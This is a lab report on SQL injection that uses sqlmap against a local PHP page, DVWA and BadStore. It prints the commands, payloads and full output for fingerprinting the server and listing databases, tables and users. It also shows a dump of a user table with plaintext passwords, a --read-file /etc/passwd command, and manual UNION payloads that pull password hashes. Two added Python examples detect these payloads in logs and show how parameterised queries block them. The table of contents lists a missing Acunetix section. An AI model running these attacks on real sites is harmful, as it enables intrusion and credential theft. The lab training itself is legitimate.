
SQL Injection 2

SQLMap

Index

1. Local attack ........................................ 3
   A) DB server and version ........................... 3
   B) DB name ......................................... 5
   C) Tables .......................................... 6
   D) Columns ......................................... 7
   E) Table contents .................................. 8
   F) Other databases ................................. 9
   G) MySQL users ..................................... 10
2. DVWA ................................................ 12
   Installation ....................................... 12
3. BadStore ............................................ 17
   A) DB server and version ........................... 17
   B) DB name ......................................... 19
   C) Tables .......................................... 20
   D) Columns ......................................... 21
   E) Other databases ................................. 22
4. Acunetix ............................................ 23
   A) DB server and version ........................... 23
   B) DB name ......................................... 25
   C) Tables .......................................... 26
   D) Columns ......................................... 27

Iván Martín Valderas

Página 2

SQL Injection

1. Local attack

We are going to carry out a SQL injection attack against our earlier page, the one that ran a query against our MySQL database. Its location is: http://localhost/ejerPHP/SQL_Injection/consulta.php

For this we will use the SQLMap program from the console.

A) DB server and version

First we find out the type of database server and its version; for this we use sqlmap's -b option:

C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://localhost/ejerPHP/SQL_Injection/consulta.php?id=1 -b


sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 13:57:25

[13:57:26] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\localhost\session' as session file
[13:57:26] [INFO] testing connection to the target url
[13:57:26] [INFO] testing if the url is stable, wait a few seconds
[13:57:27] [INFO] url is stable
[13:57:27] [INFO] testing if GET parameter 'id' is dynamic
[13:57:27] [INFO] confirming that GET parameter 'id' is dynamic
[13:57:27] [INFO] GET parameter 'id' is dynamic
[13:57:28] [WARNING] heuristic test shows that GET parameter 'id' might not be injectable
[13:57:28] [INFO] testing sql injection on GET parameter 'id'
[13:57:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[13:57:28] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[13:57:28] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[13:57:28] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[13:57:28] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[13:57:28] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[13:57:28] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[13:57:28] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[13:57:28] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[13:57:28] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[13:57:38] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable
[13:57:38] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[13:57:38] [INFO] target url appears to be UNION injectable with 3 columns
[13:57:38] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 10 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N] Y
sqlmap identified the following injection points with a total of 29 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 6656=6656

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8382 UNION ALL SELECT CONCAT(CHAR(58,106,114,107,58),IFNULL(CAST(CHAR(71,89,68,77,83,86,116,75,108,116) AS CHAR),CHAR(32)),CHAR(58,108,107,98,58)), NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1 AND SLEEP(5)
---
[13:57:44] [INFO] the back-end DBMS is MySQL
[13:57:44] [INFO] fetching banner
web server operating system: Windows
web application technology: PHP 5.3.5, Apache 2.2.17
back-end DBMS: MySQL 5.0.11
banner: '5.5.8'
[13:57:44] [INFO] Fetched data logged to text files under 'C:\sqlmap-0.9\sqlmap\output\localhost'

[*] shutting down at: 13:57:44

In this step the program has tested each of the candidate techniques to find out the server type:

- 'MySQL > 5.0.11
- 'PostgreSQL > 8.1
- 'Microsoft SQL Server

After these operations we find the version: MySQL 5.0.11. Note that this is sqlmap's fingerprint (the version its successful technique-specific tests imply); the actual server version string is in the banner line fetched with -b, which reads '5.5.8'.
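The three injection types sqlmap reported in this run (a boolean probe of the form `AND n=n`, a `UNION ALL SELECT ... CONCAT(CHAR(...))` column probe, and a `SLEEP(5)` time-based probe) leave a recognisable trace in the web server's access log. The following Python example is added here and is neither part of the original report nor sqlmap's own code: it parses constructed access-log lines whose query strings reuse the payloads printed above, classifies each request by technique, and decodes the `CHAR(...)` calls that sqlmap uses to hide its marker strings. It also covers the error-based `FLOOR(RAND(0)*2) ... GROUP BY` form that appears in the Acunetix section of this report. The IP addresses, timestamps and status codes in the log lines are constructed.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (not taken from the report). The query strings are the
# payloads sqlmap printed in this report, URL-encoded the way a client would send them.
SAMPLE_LOG = """\
127.0.0.1 - - [01/Jan/2012:13:57:28 +0100] "GET /ejerPHP/SQL_Injection/consulta.php?id=1 HTTP/1.1" 200 512
127.0.0.1 - - [01/Jan/2012:13:57:28 +0100] "GET /ejerPHP/SQL_Injection/consulta.php?id=1%20AND%206656%3D6656 HTTP/1.1" 200 512
127.0.0.1 - - [01/Jan/2012:13:57:38 +0100] "GET /ejerPHP/SQL_Injection/consulta.php?id=-8382%20UNION%20ALL%20SELECT%20CONCAT(CHAR(58,106,114,107,58),IFNULL(CAST(CHAR(71,89,68,77,83,86,116,75,108,116)%20AS%20CHAR),CHAR(32)),CHAR(58,108,107,98,58)),%20NULL,%20NULL%23 HTTP/1.1" 200 530
127.0.0.1 - - [01/Jan/2012:13:57:43 +0100] "GET /ejerPHP/SQL_Injection/consulta.php?id=1%20AND%20SLEEP(5) HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2012:10:54:00 +0100] "GET /listproducts.php?cat=1%20AND%20(SELECT%20997%20FROM(SELECT%20COUNT(*),CONCAT(CHAR(58,109,99,107,58),(SELECT%20(CASE%20WHEN%20(997%3D997)%20THEN%201%20ELSE%200%20END)),CHAR(58,118,112,120,58),FLOOR(RAND(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a) HTTP/1.1" 500 1021
"""

# One signature per technique family that sqlmap reported in this document.
SIGNATURES = [
    ("boolean-based blind", re.compile(r"\bAND\s+(\d+)\s*=\s*\1\b", re.I)),
    ("UNION query", re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I)),
    ("time-based blind", re.compile(r"\bSLEEP\s*\(\s*\d+\s*\)", re.I)),
    ("error-based", re.compile(r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I)),
]

REQUEST_RE = re.compile(r'"GET (\S+) HTTP/')
CHAR_CALL_RE = re.compile(r"CHAR\(\s*([\d\s,]+)\)", re.I)


def decode_char_calls(sql):
    """Turn every CHAR(n,n,...) call in the text into the string it builds."""
    return ["".join(chr(int(n)) for n in m.group(1).split(","))
            for m in CHAR_CALL_RE.finditer(sql)]


def classify(query):
    """Return the technique names whose signature appears in a decoded query string."""
    return [name for name, rx in SIGNATURES if rx.search(query)]


def analyse_log(text):
    """Parse Common Log Format lines and report the injection techniques seen in each."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        path, _, raw_query = m.group(1).partition("?")
        query = unquote_plus(raw_query)  # %20 -> space, %3D -> '=', %23 -> '#'
        findings.append({
            "path": path,
            "query": query,
            "types": classify(query),
            "markers": decode_char_calls(query),
        })
    return findings


if __name__ == "__main__":
    for f in analyse_log(SAMPLE_LOG):
        if f["types"]:
            print(f"{f['path']}: {', '.join(f['types'])}  markers={f['markers']}")
```

The decoded markers for the UNION payload are `:jrk:` and `:lkb:` around a random string; sqlmap wraps the value it extracts in such delimiters so it can find it in the page, which is why a `CHAR(58,...,58)` pair is a strong indicator in logs even when the rest of the payload is obfuscated. The time-based probe is the one a log alone under-reports: the request looks harmless, so correlate it with response time if the server records it.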


B) DB name

This is the first step towards extracting all the information we can from our victim, since from here on we will work our way step by step deeper into the DB. We retrieve the name of the database that the query we ran refers to, that is, the current database, with the option: --current-db

C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://localhost/ejerPHP/SQL_Injection/consulta.php?id=1 --current-db


sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 14:01:02

[14:01:02] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\localhost\session' as session file
[14:01:02] [INFO] resuming injection data from session file
[14:01:02] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file
[14:01:02] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 6656=6656

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8382 UNION ALL SELECT CONCAT(CHAR(58,106,114,107,58),IFNULL(CAST(CHAR(71,89,68,77,83,86,116,75,108,116) AS CHAR),CHAR(32)),CHAR(58,108,107,98,58)), NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1 AND SLEEP(5)
---
[14:01:03] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.5, Apache 2.2.17
back-end DBMS: MySQL 5.0.11
[14:01:03] [INFO] fetching current database
current database: 'asir1'
[14:01:03] [INFO] Fetched data logged to text files under 'C:\sqlmap-0.9\sqlmap\output\localhost'

[*] shutting down at: 14:01:03

The name of the database is asir1.

C) Tables

Once we have the database name, we can go on to list its tables with the --tables option, passing -D asir1 with the name we obtained earlier:

C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://localhost/ejerPHP/SQL_Injection/consulta.php?id=1 --tables -D asir1


sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 14:04:48

[14:04:48] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\localhost\session' as session file
[14:04:48] [INFO] resuming injection data from session file
[14:04:48] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file
[14:04:48] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 6656=6656

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8382 UNION ALL SELECT CONCAT(CHAR(58,106,114,107,58),IFNULL(CAST(CHAR(71,89,68,77,83,86,116,75,108,116) AS CHAR),CHAR(32)),CHAR(58,108,107,98,58)), NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1 AND SLEEP(5)
---
[14:04:49] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.5, Apache 2.2.17
back-end DBMS: MySQL 5.0.11
[14:04:49] [INFO] fetching tables for database 'asir1'
[14:04:49] [INFO] the SQL query used returns 1 entries
Database: asir1
[1 table]
+----------+
| usuarios |
+----------+

[14:04:49] [INFO] Fetched data logged to text files under 'C:\sqlmap-0.9\sqlmap\output\localhost'

[*] shutting down at: 14:04:49

We obtain one table: usuarios


D) Columns

C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://localhost/ejerPHP/SQL_Injection/consulta.php?id=1 --columns -T usuarios -D asir1


sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 14:06:30

[14:06:30] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\localhost\session' as session file
[14:06:30] [INFO] resuming injection data from session file
[14:06:30] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file
[14:06:30] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 6656=6656

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8382 UNION ALL SELECT CONCAT(CHAR(58,106,114,107,58),IFNULL(CAST(CHAR(71,89,68,77,83,86,116,75,108,116) AS CHAR),CHAR(32)),CHAR(58,108,107,98,58)), NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1 AND SLEEP(5)
---
[14:06:31] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.5, Apache 2.2.17
back-end DBMS: MySQL 5.0.11
[14:06:31] [INFO] fetching columns for table 'usuarios' on database 'asir1'
[14:06:31] [INFO] the SQL query used returns 3 entries
Database: asir1
Table: usuarios
[3 columns]
+----------+------------------+
| Column   | Type             |
+----------+------------------+
| id       | int(10) unsigned |
| nonmbre  | varchar(50)      |
| password | varchar(50)      |
+----------+------------------+

[14:06:31] [INFO] Fetched data logged to text files under 'C:\sqlmap-0.9\sqlmap\output\localhost'

[*] shutting down at: 14:06:31

We have obtained the column names and their types.

E) Table contents

C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://localhost/ejerPHP/SQL_Injection/consulta.php?id=1 --dump -T usuarios -D asir1


sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 14:07:28

[14:07:28] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\localhost\session' as session file
[14:07:28] [INFO] resuming injection data from session file
[14:07:28] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file
[14:07:28] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 6656=6656

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8382 UNION ALL SELECT CONCAT(CHAR(58,106,114,107,58),IFNULL(CAST(CHAR(71,89,68,77,83,86,116,75,108,116) AS CHAR),CHAR(32)),CHAR(58,108,107,98,58)), NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1 AND SLEEP(5)
---
[14:07:28] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.5, Apache 2.2.17
back-end DBMS: MySQL 5.0.11
[14:07:29] [INFO] fetching columns for table 'usuarios' on database 'asir1'
[14:07:29] [INFO] read from file 'C:\sqlmap-0.9\sqlmap\output\localhost\session': id, int(10) unsigned, nonmbre, varchar(50), password, varchar(50)
[14:07:29] [INFO] fetching entries for table 'usuarios' on database 'asir1'
[14:07:29] [INFO] the SQL query used returns 3 entries
Database: asir1
Table: usuarios
[3 entries]
+----+---------+----------+
| id | nonmbre | password |
+----+---------+----------+
| 2  | ivan    | ivanasir |
| 3  | luci    | luciasir |
| 1  | root    | asir2012 |
+----+---------+----------+

We now have the complete usuarios table from the asir1 database.

F) Other databases

C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://localhost/ejerPHP/SQL_Injection/consulta.php?id=1 --dbs


sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 14:08:22

[14:08:22] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\localhost\session' as session file
[14:08:22] [INFO] resuming injection data from session file
[14:08:22] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file
[14:08:22] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 6656=6656

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8382 UNION ALL SELECT CONCAT(CHAR(58,106,114,107,58),IFNULL(CAST(CHAR(71,89,68,77,83,86,116,75,108,116) AS CHAR),CHAR(32)),CHAR(58,108,107,98,58)), NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1 AND SLEEP(5)
---
[14:08:22] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.5, Apache 2.2.17
back-end DBMS: MySQL 5.0.11
[14:08:22] [INFO] fetching database names
[14:08:22] [INFO] the SQL query used returns 8 entries
available databases [8]:
[*] asir1
[*] cdcol
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test
[*] webauth

G) MySQL users

C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://localhost/ejerPHP/SQL_Injection/consulta.php?id=1 --users


sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 14:10:03

[14:10:03] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\localhost\session' as session file
[14:10:03] [INFO] resuming injection data from session file
[14:10:03] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file
[14:10:03] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 6656=6656

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8382 UNION ALL SELECT CONCAT(CHAR(58,106,114,107,58),IFNULL(CAST(CHAR(71,89,68,77,83,86,116,75,108,116) AS CHAR),CHAR(32)),CHAR(58,108,107,98,58)), NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1 AND SLEEP(5)
---
[14:10:03] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.5, Apache 2.2.17
back-end DBMS: MySQL 5.0.11
[14:10:03] [INFO] fetching database users
[14:10:03] [INFO] the SQL query used returns 58 entries
database management system users [4]:
[*] ''@'localhost'
[*] 'pma'@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'localhost'


Only the root user exists. Here lies one of the problems: we are using the root user that MySQL ships with by default to connect from PHP. If we are using the root user for our SQL statements, that means we can make calls to the system:

This is how we could learn the passwords in use, for example on UNIX:

C:\sqlmap-0.9\sqlmap>sqlmap.py -u http://localhost/ejerPHP/SQL_Injection/consulta.php?id=1 --read-file /etc/passwd

2. DVWA

Damn Vulnerable Web App [[The folder must be placed in htdocs]]

Installation

Default username = admin
Default password = password

To access it, we type in our browser: http://127.0.0.1/dvwa/

We create the database.


We check that the vulnerability exists:

1' or '1'='1' union select password, first_name from users where first_name='admin

ID: 1' or '1'='1' union select password, first_name from users where first_name='admin
First name: 5f4dcc3b5aa765d61d8327deb882cf99 Surname: admin

http://es.scribd.com/doc/48652427/Practica-SQL-Injection-en-DVWA


We have obtained a password, although as we can see it is encoded; we will use a web utility to decode it:

We try to extract all the passwords at once, since with the previous code we would have to do it one by one:

1' or '1'='1' union select first_name, password from users where '1'='1
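Both DVWA payloads work because the low-security page splices the User ID field straight into its SQL text, so the single quote in the payload closes the literal and the rest is parsed as SQL. The following Python example is added here and is not DVWA's code: it rebuilds that query over an in-memory SQLite table that stands in for DVWA's users table (SQLite rather than MySQL, and a constructed set of rows; admin/password is DVWA's default login from above), runs both payloads through the vulnerable string-built query and through a parameterised one, and shows that the "decode" step is really a lookup of the MD5 digest against candidate words, since DVWA stores passwords as unsalted MD5.

```python
import hashlib
import sqlite3

# Constructed rows (not DVWA's seed data); admin/password is the default login named above.
USERS = [
    (1, "admin", "admin", "password"),
    (2, "Ana", "Lopez", "abc123"),
    (3, "Luis", "Perez", "letmein"),
]

# The two payloads typed into DVWA's "User ID" field in this section.
DVWA_PAYLOAD_ONE = "1' or '1'='1' union select password, first_name from users where first_name='admin"
DVWA_PAYLOAD_ALL = "1' or '1'='1' union select first_name, password from users where '1'='1"


def md5_hex(word):
    """Unsalted MD5 hex digest, which is how DVWA stores its passwords."""
    return hashlib.md5(word.encode()).hexdigest()


def make_db():
    """In-memory SQLite stand-in for DVWA's users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?)",
                     [(uid, fn, ln, md5_hex(pw)) for uid, fn, ln, pw in USERS])
    return conn


def lookup_vulnerable(conn, user_id):
    """Mirror of DVWA's low-security query: the parameter is concatenated into the SQL."""
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, user_id):
    """Same query with a bound parameter: the payload is compared as data, never parsed."""
    return conn.execute(
        "SELECT first_name, last_name FROM users WHERE user_id = ?", (user_id,)
    ).fetchall()


def match_hash(digest, candidates):
    """What a web 'MD5 decoder' does: hash each candidate word and compare with the digest."""
    for word in candidates:
        if md5_hex(word) == digest:
            return word
    return None


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, payload one:", lookup_vulnerable(db, DVWA_PAYLOAD_ONE))
    print("vulnerable, all rows:   ", lookup_vulnerable(db, DVWA_PAYLOAD_ALL))
    print("parameterised:          ", lookup_safe(db, DVWA_PAYLOAD_ONE))
    print("hash lookup:            ", match_hash(md5_hex("password"), ["123456", "password"]))
```

With the first payload the vulnerable lookup returns the three real rows plus a fourth whose "first name" is the admin password digest, exactly the `First name: 5f4dcc3b...` line the report shows; the parameterised lookup returns nothing because the whole payload is compared against user_id as one value. In PHP the equivalent fix is a mysqli or PDO prepared statement with bound parameters. The hash lookup succeeds only because the stored digest is unsalted MD5 of a common word; a slow salted password hash removes that shortcut.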


3. BadStore

If we type a double quote (") in the search field we get a response from the SQL server, so we can anticipate a SQL vulnerability.

As with the first exercise, we will follow the same steps.

A) DB server and version

C:\sqlmap-0.9\sqlmap>sqlmap.py -u "http://192.168.13.164/cgi-bin/badstore.cgi?searchquery=hi&action=search&x=0&y=0" -b

sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 10:02:41

[10:02:41] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\192.168.13.164\session' as session file
[10:02:41] [INFO] testing connection to the target url
[10:02:41] [INFO] testing if the url is stable, wait a few seconds
[10:02:42] [INFO] url is stable
[10:02:42] [INFO] testing if GET parameter 'searchquery' is dynamic
[10:02:43] [WARNING] GET parameter 'searchquery' is not dynamic
[10:02:43] [INFO] heuristic test shows that GET parameter 'searchquery' might be injectable (possible DBMS: MySQL)
[10:02:43] [INFO] testing sql injection on GET parameter 'searchquery'
[10:02:43] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:02:44] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[10:02:45] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[10:02:45] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
parsed error message(s) showed that the back-end DBMS could be MySQL. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
[10:02:52] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[10:02:57] [INFO] target url appears to be UNION injectable with 4 columns
[10:02:57] [INFO] GET parameter 'searchquery' is 'MySQL UNION query (NULL) - 1 to 10 columns' injectable
GET parameter 'searchquery' is vulnerable. Do you want to keep testing the others? [y/N] y

Here it has warned us that the searchquery parameter is vulnerable, that is, the search box where we inserted the double quote (") earlier is passed as a GET parameter that will let us insert SQL statements there; it also asks whether we want to look for other vulnerable parameters.

[10:03:05] [INFO] testing if GET parameter 'action' is dynamic
[10:03:05] [INFO] confirming that GET parameter 'action' is dynamic
[10:03:05] [INFO] GET parameter 'action' is dynamic
[10:03:05] [WARNING] heuristic test shows that GET parameter 'action' might not be injectable
[10:03:05] [INFO] testing sql injection on GET parameter 'action'
[10:03:05] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:03:06] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[10:03:07] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[10:03:07] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[10:03:08] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[10:03:12] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[10:03:17] [WARNING] GET parameter 'action' is not injectable
[10:03:17] [INFO] testing if GET parameter 'x' is dynamic
[10:03:17] [WARNING] GET parameter 'x' is not dynamic
[10:03:17] [WARNING] heuristic test shows that GET parameter 'x' might not be injectable
[10:03:17] [INFO] testing sql injection on GET parameter 'x'
[10:03:17] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:03:19] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[10:03:19] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[10:03:20] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[10:03:20] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[10:03:25] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[10:03:31] [WARNING] GET parameter 'x' is not injectable
[10:03:31] [INFO] testing if GET parameter 'y' is dynamic
[10:03:31] [WARNING] GET parameter 'y' is not dynamic
[10:03:31] [WARNING] heuristic test shows that GET parameter 'y' might not be injectable
[10:03:31] [INFO] testing sql injection on GET parameter 'y'
[10:03:31] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:03:32] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[10:03:33] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[10:03:33] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[10:03:34] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[10:03:39] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[10:03:44] [WARNING] GET parameter 'y' is not injectable
sqlmap identified the following injection points with a total of 380 HTTP(s) requests:
---
Place: GET
Parameter: searchquery
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: searchquery=hi' UNION ALL SELECT NULL, NULL, NULL, CONCAT(CHAR(58,118,116,114,58),CHAR(101,111,97,108,121,122,120,65,111,103),CHAR(58,114,101,109,58))# AND 'bYfh'='bYfh&action=search&x=0&y=0

---
[10:03:45] [INFO] testing MySQL
[10:03:45] [INFO] confirming MySQL
[10:03:45] [INFO] the back-end DBMS is MySQL
[10:03:45] [INFO] fetching banner
web application technology: Apache 1.3.28
back-end DBMS: MySQL < 5.0.0
banner: '4.1.7-standard'
[10:03:45] [INFO] Fetched data logged to text files under 'C:\sqlmap-0.9\sqlmap\output\192.168.13.164'

[*] shutting down at: 10:03:45

B) DB name

C:\sqlmap-0.9\sqlmap>sqlmap.py -u "http://192.168.13.164/cgi-bin/badstore.cgi?searchquery=hi&action=search&x=0&y=0" --current-db


sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 10:12:35

[10:12:35] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\192.168.13.164\session' as session file
[10:12:35] [INFO] resuming injection data from session file
[10:12:35] [INFO] resuming back-end DBMS 'mysql 4' from session file
[10:12:35] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: searchquery
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: searchquery=hi' UNION ALL SELECT NULL, NULL, NULL, CONCAT(CHAR(58,118,116,114,58),CHAR(101,111,97,108,121,122,120,65,111,103),CHAR(58,114,101,109,58))# AND 'bYfh'='bYfh&action=search&x=0&y=0
---
[10:12:35] [INFO] the back-end DBMS is MySQL
web application technology: Apache 1.3.28
back-end DBMS: MySQL 4
[10:12:35] [INFO] fetching current database
current database: 'badstoredb'
[10:12:36] [INFO] Fetched data logged to text files under 'C:\sqlmap-0.9\sqlmap\output\192.168.13.164'

[*] shutting down at: 10:12:36

The name of the DB is badstoredb.

C) Tables

C:\sqlmap-0.9\sqlmap>sqlmap.py -u "http://192.168.13.164/cgi-bin/badstore.cgi?searchquery=hi&action=search&x=0&y=0" --tables -D badstoredb

sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 10:20:13

[10:20:13] [INFO] using 'C:\sqlmap-0.9\sqlmap\output\192.168.13.164\session' as session file
[10:20:13] [INFO] resuming injection data from session file
[10:20:13] [INFO] resuming back-end DBMS 'mysql 4' from session file
[10:20:13] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: searchquery
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: searchquery=hi' UNION ALL SELECT NULL, NULL, NULL, CONCAT(CHAR(58,118,116,114,58),CHAR(101,111,97,108,121,122,120,65,111,103),CHAR(58,114,101,109,58))# AND 'bYfh'='bYfh&action=search&x=0&y=0
---
[10:20:14] [INFO] the back-end DBMS is MySQL
web application technology: Apache 1.3.28
back-end DBMS: MySQL 4
[10:20:14] [ERROR] information_schema not available, back-end DBMS is MySQL < 5.0
do you want to use common table existance check? [Y/n/q] y
[10:20:21] [INFO] checking table existence using items from 'C:\sqlmap-0.9\sqlmap\txt\common-tables.txt'
[10:20:21] [INFO] adding words used on web page to the check list
please enter number of threads? [Enter for 1 (current)]
[10:20:28] [WARNING] running in a single-thread mode. This could take a while.
[10:27:14] [INFO] retrieved: itemdb
Database: badstoredb
[1 table]
+--------+
| itemdb |
+--------+

